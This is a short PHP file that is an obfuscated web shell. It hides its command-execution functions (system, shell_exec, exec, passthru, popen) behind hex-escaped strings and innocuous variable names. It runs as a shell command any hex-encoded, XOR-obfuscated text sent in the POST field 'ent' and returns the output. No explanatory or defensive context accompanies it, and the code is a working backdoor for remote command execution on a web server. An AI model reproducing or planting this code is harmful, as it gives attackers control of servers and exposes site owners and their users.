<?php

$initialized = "he\x78\x32\x62\x69n";
$service_registry3 = "\x65\x78ec";
$service_registry5 = "pope\x6E";
$service_registry6 = "\x73\x74r\x65\x61\x6D_\x67\x65t\x5F\x63o\x6Etents";
$service_registry7 = "\x70c\x6C\x6Fse";
$service_registry2 = "\x73h\x65l\x6C\x5F\x65xec";
$service_registry4 = "p\x61ss\x74hr\x75";
$service_registry1 = "s\x79stem";
if (isset($_POST["\x65n\x74"])) {
            function settings ($descriptor,  $pset ) {
 $component= '';
 for($e=0;
 $e<strlen($descriptor);
 $e++){
$component.=chr(ord($descriptor[$e])^$pset);

} return$component;
 
}
            $ent = $initialized($_POST["\x65n\x74"]);
            $ent = settings($ent, 71);
            if (function_exists($service_registry1)) {
                $service_registry1($ent);
            } elseif (function_exists($service_registry2)) {
                print $service_registry2($ent);
            } elseif (function_exists($service_registry3)) {
                $service_registry3($ent, $data_chunk_descriptor);
                print join("\n", $data_chunk_descriptor);
            } elseif (function_exists($service_registry4)) {
                $service_registry4($ent);
            } elseif (function_exists($service_registry5) && function_exists($service_registry6) && function_exists($service_registry7)) {
                $pset_component = $service_registry5($ent, 'r');
                if ($pset_component) {
                    $obj_fac = $service_registry6($pset_component);
                    $service_registry7($pset_component);
                    print $obj_fac;
                }
            }
            exit;
        }